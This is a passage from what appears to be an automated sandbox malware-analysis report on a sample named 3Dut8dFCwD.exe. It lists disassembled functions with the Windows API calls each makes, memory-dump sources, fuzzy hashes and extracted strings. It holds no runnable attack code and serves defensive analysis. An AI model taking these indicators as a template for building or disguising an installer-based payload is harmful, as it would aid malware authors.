                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                              • String ID: {
                              • API String ID: 590372296-366298937
                              • Opcode ID: 17f82a3091fa66928221ea1c6b9dda913e53b80d5dd41b689f6bd494f538d155
                              • Instruction ID: bada4f766a7f909e2fcc31d20e9d53a26b7aeb91fc87c8d9c8de415280c65713
                              • Opcode Fuzzy Hash: 17f82a3091fa66928221ea1c6b9dda913e53b80d5dd41b689f6bd494f538d155
                              • Instruction Fuzzy Hash: 4DB14AB1900608FFDF11AF61DD85AAE7B79FB48354F00813AFA41B61A0CB784A51DF68
                              APIs
                              • GetDlgItem.USER32(?,000003FB), ref: 004049F3
                              • SetWindowTextW.USER32(00000000,?), ref: 00404A1D
                              • SHBrowseForFolderW.SHELL32(?), ref: 00404ACE
                              • CoTaskMemFree.OLE32(00000000), ref: 00404AD9
                              • lstrcmpiW.KERNEL32(007A6200,007A1748,00000000,?,?), ref: 00404B0B
                              • lstrcatW.KERNEL32(?,007A6200), ref: 00404B17
                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B29
                                • Part of subcall function 00405B78: GetDlgItemTextW.USER32(?,?,00000400,00404B60), ref: 00405B8B
                                • Part of subcall function 004067E2: CharNextW.USER32(?,*?|<>/":,00000000,007B3000,75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037F9,?,00000008,0000000A,0000000C), ref: 00406845
                                • Part of subcall function 004067E2: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406854
                                • Part of subcall function 004067E2: CharNextW.USER32(?,007B3000,75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037F9,?,00000008,0000000A,0000000C), ref: 00406859
                                • Part of subcall function 004067E2: CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037F9,?,00000008,0000000A,0000000C), ref: 0040686C
                              • GetDiskFreeSpaceW.KERNEL32(0079F718,?,?,0000040F,?,0079F718,0079F718,?,00000001,0079F718,?,?,000003FB,?), ref: 00404BEC
                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C07
                                • Part of subcall function 00404D60: lstrlenW.KERNEL32(007A1748,007A1748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E01
                                • Part of subcall function 00404D60: wsprintfW.USER32 ref: 00404E0A
                                • Part of subcall function 00404D60: SetDlgItemTextW.USER32(?,007A1748), ref: 00404E1D
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                              • String ID: A
                              • API String ID: 2624150263-3554254475
                              • Opcode ID: 426e44edd7368518c1c7f183de8445ff04209b3407d9146befa81bf80a1aac5c
                              • Instruction ID: a16cb653eec2d326bc9532795c0b3c746b0ee9de9a15b8a8e70a0412fee6ffe7
                              • Opcode Fuzzy Hash: 426e44edd7368518c1c7f183de8445ff04209b3407d9146befa81bf80a1aac5c
                              • Instruction Fuzzy Hash: F3A194B1900208ABDB119FA6DD85BAF77B8EF84314F11803BF601B62D1D77C9A418B69
                              APIs
                              • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E
                              Strings
                              • C:\Users\user\AppData\Local\Temp\nsm4D39.tmp, xrefs: 0040226E
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: CreateInstance
                              • String ID: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp
                              • API String ID: 542301482-1064468493
                              • Opcode ID: dc1c51b489d66c3ae56a3330a78418c281c6f978a235157eafada417e1326d44
                              • Instruction ID: ec9576eb85d19529fc8e70744cd4d9d757721a0e149670041693576dbfb17bce
                              • Opcode Fuzzy Hash: dc1c51b489d66c3ae56a3330a78418c281c6f978a235157eafada417e1326d44
                              • Instruction Fuzzy Hash: 82410575A00209AFCB40DFE4C989EAD7BB5FF48308B20456EF505EB2D1DB799982CB54
                              APIs
                              • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: FileFindFirst
                              • String ID:
                              • API String ID: 1974802433-0
                              • Opcode ID: dca364261a257630479412f8d24045f74174dcbea33d49aeb6f7c432ef55f1d3
                              • Instruction ID: a3e640cb8dc0d2d7f963ac08cc51882bce801df3f972718032989310b2356a06
                              • Opcode Fuzzy Hash: dca364261a257630479412f8d24045f74174dcbea33d49aeb6f7c432ef55f1d3
                              • Instruction Fuzzy Hash: 82F05E71904104AAD701EBA4EA499AEB378EF14314F60457BE102F21E0DBB849119B1A
                              APIs
                              • GetDlgItem.USER32(?,000003F9), ref: 00404F38
                              • GetDlgItem.USER32(?,00000408), ref: 00404F43
                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F8D
                              • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FA4
                              • SetWindowLongW.USER32(?,000000FC,0040552D), ref: 00404FBD
                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FD1
                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FE3
                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404FF9
                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405005
                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405017
                              • DeleteObject.GDI32(00000000), ref: 0040501A
                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405045
                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405051
                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050EC
                              • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040511C
                                • Part of subcall function 004044E8: SendMessageW.USER32(00000028,?,00000001,00404313), ref: 004044F6
                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405130
                              • GetWindowLongW.USER32(?,000000F0), ref: 0040515E
                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040516C
                              • ShowWindow.USER32(?,00000005), ref: 0040517C
                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405277
                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052DC
                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052F1
                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405315
                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405335
                              • ImageList_Destroy.COMCTL32(?), ref: 0040534A
                              • GlobalFree.KERNEL32(?), ref: 0040535A
                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053D3
                              • SendMessageW.USER32(?,00001102,?,?), ref: 0040547C
                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040548B
                              • InvalidateRect.USER32(?,00000000,00000001), ref: 004054B6
                              • ShowWindow.USER32(?,00000000), ref: 00405504
                              • GetDlgItem.USER32(?,000003FE), ref: 0040550F
                              • ShowWindow.USER32(00000000), ref: 00405516
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                              • String ID: $M$N
                              • API String ID: 2564846305-813528018
                              • Opcode ID: 63eace971b309785bb82105d1f3aa94bb5e313571b6fc2e62422463636cbee33
                              • Instruction ID: 407b5383e9f0600e1b6d0dc6c9775fd3f0ad17fb7be6f4e7eeeed7564f32b1fa
                              • Opcode Fuzzy Hash: 63eace971b309785bb82105d1f3aa94bb5e313571b6fc2e62422463636cbee33
                              • Instruction Fuzzy Hash: F0028A70900608AFDF20DF65DD85AAF7BB5FB85314F10816AF610BA2E1D7798A41CF58
                              APIs
                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FF0
                              • ShowWindow.USER32(?), ref: 00404010
                              • GetWindowLongW.USER32(?,000000F0), ref: 00404022
                              • ShowWindow.USER32(?,00000004), ref: 0040403B
                              • DestroyWindow.USER32 ref: 0040404F
                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404068
                              • GetDlgItem.USER32(?,?), ref: 00404087
                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 0040409B
                              • IsWindowEnabled.USER32(00000000), ref: 004040A2
                              • GetDlgItem.USER32(?,00000001), ref: 0040414D
                              • GetDlgItem.USER32(?,00000002), ref: 00404157
                              • SetClassLongW.USER32(?,000000F2,?), ref: 00404171
                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041C2
                              • GetDlgItem.USER32(?,00000003), ref: 00404268
                              • ShowWindow.USER32(00000000,?), ref: 00404289
                              • EnableWindow.USER32(?,?), ref: 0040429B
                              • EnableWindow.USER32(?,?), ref: 004042B6
                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042CC
                              • EnableMenuItem.USER32(00000000), ref: 004042D3
                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042EB
                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042FE
                              • lstrlenW.KERNEL32(007A1748,?,007A1748,00000000), ref: 00404328
                              • SetWindowTextW.USER32(?,007A1748), ref: 0040433C
                              • ShowWindow.USER32(?,0000000A), ref: 00404470
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                              • String ID:
                              • API String ID: 1860320154-0
                              • Opcode ID: b08647c02fb37b41973a387d7810d7f5d0e6d787a748a85b5b12ca029d29054f
                              • Instruction ID: c568fb1f9e303522a8696359bfc4ff9199fb68b2c3e72f23d40ed4e3cc12537a
                              • Opcode Fuzzy Hash: b08647c02fb37b41973a387d7810d7f5d0e6d787a748a85b5b12ca029d29054f
                              • Instruction Fuzzy Hash: D3C1C0B1500604ABDB206F61EE85E2A3A68FBD6759F00853EFA51B51F0CB3D5881DB2D
                              APIs
                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404710
                              • GetDlgItem.USER32(?,000003E8), ref: 00404724
                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404741
                              • GetSysColor.USER32(?), ref: 00404752
                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404760
                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040476E
                              • lstrlenW.KERNEL32(?), ref: 00404773
                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404780
                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404795
                              • GetDlgItem.USER32(?,0000040A), ref: 004047EE
                              • SendMessageW.USER32(00000000), ref: 004047F5
                              • GetDlgItem.USER32(?,000003E8), ref: 00404820
                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404863
                              • LoadCursorW.USER32(00000000,00007F02), ref: 00404871
                              • SetCursor.USER32(00000000), ref: 00404874
                              • LoadCursorW.USER32(00000000,00007F00), ref: 0040488D
                              • SetCursor.USER32(00000000), ref: 00404890
                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048BF
                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                              • String ID: N$E@
                              • API String ID: 3103080414-3433303851
                              • Opcode ID: 222016cd200aa2e6cb1c1b10df294e93f696a380f153465af12d712dc680f444
                              • Instruction ID: bdd40037bb0d452aa3b0c6711a4aa3bdd99b9424e38a8cf4b21d92dd7aac4ea1
                              • Opcode Fuzzy Hash: 222016cd200aa2e6cb1c1b10df294e93f696a380f153465af12d712dc680f444
                              • Instruction Fuzzy Hash: CB61C2B5900609BFDB10AF61DD85A6A7B69FB84304F00843AF701B62D0C77C9D61DF99
                              APIs
                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406315,?,?), ref: 004061B5
                              • GetShortPathNameW.KERNEL32(?,007A4DE8,00000400), ref: 004061BE
                                • Part of subcall function 00405F89: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040626E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F99
                                • Part of subcall function 00405F89: lstrlenA.KERNEL32(00000000,?,00000000,0040626E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCB
                              • GetShortPathNameW.KERNEL32(?,007A55E8,00000400), ref: 004061DB
                              • wsprintfA.USER32 ref: 004061F9
                              • GetFileSize.KERNEL32(00000000,00000000,007A55E8,C0000000,00000004,007A55E8,?,?,?,?,?), ref: 00406234
                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406243
                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040627B
                              • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,007A49E8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062D1
                              • GlobalFree.KERNEL32(00000000), ref: 004062E2
                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062E9
                                • Part of subcall function 00406024: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\3Dut8dFCwD.exe,80000000,00000003), ref: 00406028
                                • Part of subcall function 00406024: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040604A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                              • String ID: %ls=%ls$[Rename]$Mz$Uz$Uz
                              • API String ID: 2171350718-3350566011
                              • Opcode ID: a33c05bce7c125d61af8aa6c61577077044d65e406db0fd5498825754e73940b
                              • Instruction ID: 1eba4fe57778a2caeea4241fd1a0165fec623ab6fc85672a9c0ceb4c44b2574e
                              • Opcode Fuzzy Hash: a33c05bce7c125d61af8aa6c61577077044d65e406db0fd5498825754e73940b
                              • Instruction Fuzzy Hash: CC312470600715BBD2207B619D49F6B3B5CDF82744F16017EFA02B62C2EA7DD820867D
                              APIs
                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                              • BeginPaint.USER32(?,?), ref: 00401047
                              • GetClientRect.USER32(?,?), ref: 0040105B
                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                              • DeleteObject.GDI32(?), ref: 004010ED
                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                              • SelectObject.GDI32(00000000,?), ref: 00401140
                              • DrawTextW.USER32(00000000,007A7260,000000FF,00000010,00000820), ref: 00401156
                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                              • DeleteObject.GDI32(?), ref: 00401165
                              • EndPaint.USER32(?,?), ref: 0040116E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                              • String ID: F
                              • API String ID: 941294808-1304234792
                              • Opcode ID: 0065e8d55c47ea3cbcda8c109104f1eee6ee8d4d6af800c5cfa02106002edbf4
                              • Instruction ID: f4bc5d4286e22692ddece56c15c19c5fca937d6aefcb7484b61e28148d91a738
                              • Opcode Fuzzy Hash: 0065e8d55c47ea3cbcda8c109104f1eee6ee8d4d6af800c5cfa02106002edbf4
                              • Instruction Fuzzy Hash: 3F418A71804209AFCF058FA5CE459BFBBB9FF45314F00802EF591AA1A0CB389A55DFA4
                              APIs
                              • GetSystemDirectoryW.KERNEL32(007A6200,00000400), ref: 00406693
                              • GetWindowsDirectoryW.KERNEL32(007A6200,00000400,00000000,007A0728,?,?,00000000,00000000,00798F00,759223A0), ref: 004066A9
                              • SHGetPathFromIDListW.SHELL32(00000000,007A6200), ref: 00406707
                              • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 00406710
                              • lstrcatW.KERNEL32(007A6200,\Microsoft\Internet Explorer\Quick Launch), ref: 0040673B
                              • lstrlenW.KERNEL32(007A6200,00000000,007A0728,?,?,00000000,00000000,00798F00,759223A0), ref: 00406795
                              Strings
                              • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406664
                              • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406735
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                              • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                              • API String ID: 4024019347-730719616
                              • Opcode ID: fb78c655de7e04e2c0873077e29524e20483bf8d3f5bca8374ab451ad378ea15
                              • Instruction ID: 3bd779c8658dd38474262f04f34df11dc98fe6ff926310c24388666a45315c92
                              • Opcode Fuzzy Hash: fb78c655de7e04e2c0873077e29524e20483bf8d3f5bca8374ab451ad378ea15
                              • Instruction Fuzzy Hash: 4C6123716046019BD720AF24DD80B6A77E8AB95318F25063FF687B33D1DA3C8961875E
                              APIs
                              • GetWindowLongW.USER32(?,000000EB), ref: 00404537
                              • GetSysColor.USER32(00000000), ref: 00404575
                              • SetTextColor.GDI32(?,00000000), ref: 00404581
                              • SetBkMode.GDI32(?,?), ref: 0040458D
                              • GetSysColor.USER32(?), ref: 004045A0
                              • SetBkColor.GDI32(?,?), ref: 004045B0
                              • DeleteObject.GDI32(?), ref: 004045CA
                              • CreateBrushIndirect.GDI32(?), ref: 004045D4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
